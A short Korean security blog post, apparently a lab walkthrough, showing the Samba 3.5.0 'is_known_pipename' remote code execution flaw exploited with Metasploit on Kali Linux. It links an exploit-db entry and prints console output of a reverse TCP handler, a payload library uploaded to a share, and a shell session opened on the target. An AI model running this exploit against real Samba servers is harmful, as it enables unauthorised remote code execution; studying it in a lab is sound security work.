kkamagi's story

IT, 정보보안, 포렌식, 일상 공유

Cyber Security

[Kali Linux] - Samba 3.5.0 - Remote Code Execution

까마기 2017. 5. 31. 19:13
728x90
반응형

https://www.exploit-db.com/exploits/42084/




save image


1. exploit-db 에서 copy











msf exploit(is_known_pipename) > exploit 
[*] Started reverse TCP handler on 192.168.0.3:4444 
[*] 192.168.0.3:445 - Using location \\192.168.0.3\yarp\h for the path
[*] 192.168.0.3:445 - Payload is stored in //192.168.0.3/yarp/h as GTithXJz.so
[*] 192.168.0.3:445 - Trying location /tmp/yarp/h/GTithXJz.so...
[*] Command shell session 6 opened (192.168.0.3:4444 -> 192.168.0.3:45076) at 2017-05-24 19:41:40 -0500
id
uid=65534(nobody) gid=0(root) groups=0(root),65534(nogroup)



반응형